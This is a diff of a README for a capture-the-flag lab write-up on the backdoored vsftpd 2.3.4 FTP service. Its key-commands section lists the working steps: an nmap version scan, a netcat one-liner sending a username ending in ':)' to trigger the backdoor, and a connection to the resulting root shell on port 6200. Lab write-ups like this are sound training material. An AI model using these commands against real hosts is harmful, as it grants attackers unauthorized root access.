SgtMajorMom/HackerDNA-Writeups/Anonymous 2/README.md

-Anonymous 2 — vsftpd 2.3.4 Backdoor Exploitation
+Anonymous 2 — vsftpd 2.3.4 Backdoor
-A walkthrough of the Anonymous 2 lab from HackerDNA, demonstrating enumeration, identification, and exploitation of the intentionally backdoored vsftpd 2.3.4 service.
-This challenge highlights how a compromised software distribution can provide attackers with immediate root access through a crafted username.
+A concise walkthrough of the Anonymous 2 lab from HackerDNA, demonstrating enumeration and exploitation of the intentionally backdoored vsftpd 2.3.4 service.
+Submitting a username ending in :) triggers a hidden routine that opens a root shell on port 6200.

-Note: The lab assigns new IPs each time it launches.
-All IPs in this repository use <FTP_IP> and <WEB_IP> placeholders for clarity and reproducibility.
+Note: Lab IPs rotate on each deployment.
+All addresses are represented as <FTP_IP> and <WEB_IP>.

-🧭 Lab Summary
-This lab focuses on exploiting a malicious backdoor embedded in vsftpd 2.3.4, a version distributed after attackers compromised the official source.
-When a username ending in :) is submitted, the service opens a remote shell on port 6200.
-The goal is to identify the vulnerable service, trigger the backdoor, and retrieve the flag from the resulting root shell.

-🎯 Objectives
-Enumerate exposed services
+Objective

-Identify the vulnerable vsftpd version
+Identify the vulnerable FTP service, trigger the vsftpd backdoor, gain shell access, and retrieve the flag.

+Steps Performed
+Scanned port 21 to identify the FTP service and version

+Confirmed vsftpd 2.3.4, a known backdoored release

-Trigger the backdoor using a crafted username
+Triggered the backdoor using a crafted username ending in :)

-Connect to the spawned shell
+Connected to the spawned shell on port 6200

+Executed commands in a silent root shell

-Locate and read the flag
+Located and read the flag

-📂 Repository Contents
-Anonymous 2.pdf — Full polished writeup with screenshots

-Anonymous 2.docx — Working notes and draft version

-README.md — Overview and context for the repository

-🛠️ Tools & Techniques
-nmap for service enumeration

-Gobuster for optional web directory discovery

-nc (Netcat) for triggering the backdoor and connecting to the shell

-Linux privilege confirmation and file discovery commands
+Key Commands
+nmap -sV -p 21 <FTP_IP>

+(echo "USER test:)"; echo "PASS pass") | nc -v <FTP_IP> 21 nc -v <FTP_IP> 6200

+whoami
+cat /root/flag.txt

+Flag
+e*******-****-****-****-**********3

-🔍 Key Takeaways
+Takeaways
-vsftpd 2.3.4 is intentionally backdoored and should never be used in production environments.
+vsftpd 2.3.4 contains a deliberate backdoor and should never be deployed.

-A single compromised package can grant instant root access with minimal interaction.
+A single compromised package can provide immediate root access.

-Silent shells require confidence and methodical command execution.
+Silent shells require careful, confident command execution.

-Enumeration confirms the attack path, but exploitation is straightforward once the version is identified.
+Enumeration confirms the path; exploitation is minimal once the version is identified.